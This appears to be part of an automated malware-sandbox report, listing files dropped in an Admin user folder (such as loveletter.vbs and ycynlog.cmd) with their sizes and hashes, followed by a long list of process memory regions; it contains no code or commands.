SHA512fac10fd326830c2247497c59e2f6b391eb34c34bef5baa4a9ec12f60a4aa0342a9d18d81afeb0f476077dfbd6cfd9a3ce313b3f6a1dcb6d968a20c9856c4b883
-
C:\Users\Admin\loveletter.vbsFilesize
495B
MD5900ead69492d80e48738921eca28b14f
SHA16b51607c54f8e734a7ea47091859c3e8dce6365c
SHA256c1a49c4801603e877e673620c289d709c5c2b368dae72e941f9649889faefab3
SHA5128fbb63ea9e5e2bca05bdbcf373056e58aaae2dfd180dfca2fdfdc2b706bb3923798f9878eddf7acef255676eda65f94cc9a827e8abcc9d4da6613f33d74861f2
-
C:\Users\Admin\mail.vbsFilesize
488B
MD588ef4bc3f48eeb97aedadff8f3840980
SHA148e8167bef2562d902885a075f6190d269fd3d35
SHA256b62346a7425cfec83d3f05fc4ff268510a16493479f09e7113169aaad5abeefa
SHA512523127a83202c86445825e1d8ab84a268e4f9b40a7c76b91b4947fb29de1c0819ba3e856bc1cbd40d6b0d10c04ca356a5e0dc975708a3d765ab425ab1a7d1024
-
C:\Users\Admin\userdata.txtFilesize
13KB
MD5e50d243c8f3b4f6843335006e347c658
SHA10b7c1ddae63d51ccae975711518633c3c78ee431
SHA256f992a2636b894135a39e2aa56ef3d3879e0759d90d09a5c33131766526c1cfe5
SHA512806f17b562d915c0b5ddb0d44620e3fede1df73ba08d7758ac463a6c1adaa9af82e223378d33e45a44dbf0ec16cd26d5cd94224df3c8933ccfcf94063e0b7922
-
C:\Users\Admin\ycynlog.cmdFilesize
51KB
MD54af79fa246608df60c78e02c1670f084
SHA10441d4e69225c12656c3855e24a2702d8737a227
SHA256298c325bbc80af8b3ac77365dd7cc3f97000a8377f36937d8563ab743a92b21c
SHA5125cc0cf9575c5688a8c1aaa966da1a2f49737dc6fe24f98437472c42f1ab48cd8277f9724f7bc0361dc57a4e4d31e2fe9cdbf417b75a6eb9a81fd61bcaa65ff8f
-
memory/256-151-0x0000000000000000-mapping.dmp
-
memory/428-192-0x0000000000000000-mapping.dmp
-
memory/444-135-0x0000000000000000-mapping.dmp
-
memory/724-136-0x0000000000000000-mapping.dmp
-
memory/1264-210-0x00007FFF94080000-0x00007FFF94B41000-memory.dmpFilesize
10.8MB
-
memory/1276-161-0x0000000000000000-mapping.dmp
-
memory/1348-194-0x0000000000000000-mapping.dmp
-
memory/1408-180-0x0000000000000000-mapping.dmp
-
memory/1444-168-0x0000000000000000-mapping.dmp
-
memory/1484-133-0x0000000000000000-mapping.dmp
-
memory/1560-150-0x0000000000000000-mapping.dmp
-
memory/1620-134-0x0000000000000000-mapping.dmp
-
memory/1660-162-0x0000000000000000-mapping.dmp
-
memory/1764-152-0x0000000000000000-mapping.dmp
-
memory/1808-177-0x0000000000000000-mapping.dmp
-
memory/1844-174-0x0000000000000000-mapping.dmp
-
memory/1860-169-0x0000000000000000-mapping.dmp
-
memory/2012-216-0x00007FFF94080000-0x00007FFF94B41000-memory.dmpFilesize
10.8MB
-
memory/2020-142-0x0000000000000000-mapping.dmp
-
memory/2080-154-0x0000000000000000-mapping.dmp
-
memory/2216-188-0x0000000000000000-mapping.dmp
-
memory/2220-165-0x0000000000000000-mapping.dmp
-
memory/2220-208-0x00007FFF94080000-0x00007FFF94B41000-memory.dmpFilesize
10.8MB
-
memory/2428-222-0x0000000000980000-0x0000000000988000-memory.dmpFilesize
32KB
-
memory/2496-158-0x0000000000000000-mapping.dmp
-
memory/2560-189-0x0000000000000000-mapping.dmp
-
memory/2564-223-0x00007FFF94080000-0x00007FFF94B41000-memory.dmpFilesize
10.8MB
-
memory/2584-164-0x0000000000000000-mapping.dmp
-
memory/2652-213-0x00007FFF94080000-0x00007FFF94B41000-memory.dmpFilesize
10.8MB
-
memory/2868-185-0x0000000000000000-mapping.dmp
-
memory/2916-171-0x0000000000000000-mapping.dmp
-
memory/2928-149-0x0000000000000000-mapping.dmp
-
memory/3016-155-0x0000000000000000-mapping.dmp
-
memory/3056-179-0x0000000000000000-mapping.dmp
-
memory/3076-184-0x0000000000000000-mapping.dmp
-
memory/3132-209-0x00007FFF94080000-0x00007FFF94B41000-memory.dmpFilesize
10.8MB
-
memory/3140-182-0x0000000000000000-mapping.dmp
-
memory/3476-145-0x0000000000000000-mapping.dmp
-
memory/3528-187-0x0000000000000000-mapping.dmp
-
memory/3548-186-0x0000000000000000-mapping.dmp
-
memory/3704-153-0x0000000000000000-mapping.dmp
-
memory/3724-176-0x0000000000000000-mapping.dmp
-
memory/3732-191-0x0000000000000000-mapping.dmp
-
memory/3768-170-0x0000000000000000-mapping.dmp
-
memory/3860-190-0x0000000000000000-mapping.dmp
-
memory/3904-157-0x0000000000000000-mapping.dmp
-
memory/3956-147-0x0000000000000000-mapping.dmp
-
memory/3968-181-0x0000000000000000-mapping.dmp
-
memory/3984-175-0x0000000000000000-mapping.dmp
-
memory/4016-178-0x0000000000000000-mapping.dmp
-
memory/4060-207-0x00007FFF94080000-0x00007FFF94B41000-memory.dmpFilesize
10.8MB
-
memory/4092-193-0x0000000000000000-mapping.dmp
-
memory/4128-183-0x0000000000000000-mapping.dmp
-
memory/4180-166-0x0000000000000000-mapping.dmp
-
memory/4252-137-0x0000000000000000-mapping.dmp
-
memory/4252-138-0x000001C8DCEC0000-0x000001C8DCEE2000-memory.dmpFilesize
136KB
-
memory/4252-139-0x00007FFF951A0000-0x00007FFF95C61000-memory.dmpFilesize
10.8MB
-
memory/4376-160-0x0000000000000000-mapping.dmp
-
memory/4412-143-0x0000000000000000-mapping.dmp
-
memory/4540-201-0x00007FFF94080000-0x00007FFF94B41000-memory.dmpFilesize
10.8MB
-
memory/4568-156-0x0000000000000000-mapping.dmp
-
memory/4604-167-0x0000000000000000-mapping.dmp
-
memory/4636-141-0x0000000000000000-mapping.dmp
-
memory/4644-146-0x0000000000000000-mapping.dmp
-
memory/4704-196-0x0000000000000000-mapping.dmp
-
memory/4704-131-0x0000000000000000-mapping.dmp
-
memory/4724-140-0x0000000000000000-mapping.dmp
-
memory/4812-132-0x0000000000000000-mapping.dmp
-
memory/4856-159-0x0000000000000000-mapping.dmp
-
memory/4860-229-0x00007FFF94080000-0x00007FFF94B41000-memory.dmpFilesize
10.8MB
-
memory/4872-195-0x0000000000000000-mapping.dmp
-
memory/4872-130-0x0000000000000000-mapping.dmp
-
memory/4900-172-0x0000000000000000-mapping.dmp
-
memory/4960-163-0x0000000000000000-mapping.dmp
-
memory/5036-144-0x0000000000000000-mapping.dmp
-
memory/5108-173-0x0000000000000000-mapping.dmp